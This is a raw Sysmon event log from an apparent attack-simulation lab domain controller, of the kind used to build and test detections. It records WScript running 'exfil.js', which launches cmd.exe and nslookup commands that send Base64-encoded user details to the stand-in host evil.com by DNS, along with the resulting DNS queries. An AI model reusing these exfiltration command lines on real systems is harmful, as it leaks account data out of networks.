C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwpo.tmp 2>&1 23542300x8000000000000000194602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.606{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=958EF205C1766D6B67841621DE0D7333,SHA256=EF6C5CFED1C586D61CE18AD15EEB06A2111BA1FDF7CFC45CC2A2A8A6EB473066,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.604{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-E03D-000000005F02}7672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.600{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-E03D-000000005F02}7672C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.584{2E1864BB-17A7-629A-E03D-000000005F02}76723300C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-DF3D-000000005F02}1344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000194598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.158{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52130- 354300x8000000000000000194597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.157{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52129- 354300x8000000000000000194596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.154{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52128- 354300x8000000000000000194595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.154{00000000-0000-0000-0000-000000000000}7784<unknown process>-udptruefalse127.0.0.1-52128-false127.0.0.1-53domain 354300x8000000000000000194594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.986{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52127- 354300x8000000000000000194593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.985{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52126- 354300x8000000000000000194592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.985{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52125- 354300x8000000000000000194591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.985{00000000-0000-0000-0000-000000000000}5184<unknown process>-udptruefalse127.0.0.1-52125-false127.0.0.1-53domain 10341000x8000000000000000194590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.568{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E03D-000000005F02}7672C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.553{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.553{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-DF3D-000000005F02}1344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.553{2E1864BB-17A1-629A-783D-000000005F02}5552436C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-DF3D-000000005F02}1344C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.563{2E1864BB-17A7-629A-DF3D-000000005F02}1344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwpo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.553{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhuris.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.506{2E1864BB-17A7-629A-DD3D-000000005F02}8132732C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-DE3D-000000005F02}2036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000194580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.506{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFD15CCF21637F885DE9C03D8F8EF3CD,SHA256=2D0FAD29205A0E741FD514040296E982F303B6BE7B7519380CBE025023C5FBAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.506{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.506{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.506{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.506{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.506{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-DE3D-000000005F02}2036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.505{2E1864BB-17A7-629A-DC3D-000000005F02}41527248C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-DE3D-000000005F02}2036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.505{2E1864BB-17A7-629A-DE3D-000000005F02}2036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-DC3D-000000005F02}4152C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhuris.tmp 2>&1 22542200x8000000000000000194572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.365{00000000-0000-0000-0000-000000000000}2060evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.270{00000000-0000-0000-0000-000000000000}2032evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.144{00000000-0000-0000-0000-000000000000}7784evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.987{00000000-0000-0000-0000-000000000000}5184evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.798{00000000-0000-0000-0000-000000000000}3348evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.649{00000000-0000-0000-0000-000000000000}420evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.512{00000000-0000-0000-0000-000000000000}5108evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.375{00000000-0000-0000-0000-000000000000}7356evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.118{00000000-0000-0000-0000-000000000000}7992evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000194563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.458{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-DD3D-000000005F02}8132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.458{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-DD3D-000000005F02}8132C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.443{2E1864BB-17A7-629A-DD3D-000000005F02}8132732C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-DC3D-000000005F02}4152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.443{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-DD3D-000000005F02}8132C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.427{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 